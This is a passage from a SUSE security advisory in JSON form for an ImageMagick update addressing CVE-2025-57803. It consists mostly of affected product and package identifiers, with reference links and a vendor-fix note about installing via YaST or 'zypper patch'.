"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-57803",
"url": "https://www.suse.com/security/cve/CVE-2025-57803"
},
{
"category": "external",
"summary": "SUSE Bug 1248784 for CVE-2025-57803",
"url": "https://bugzilla.suse.com/1248784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
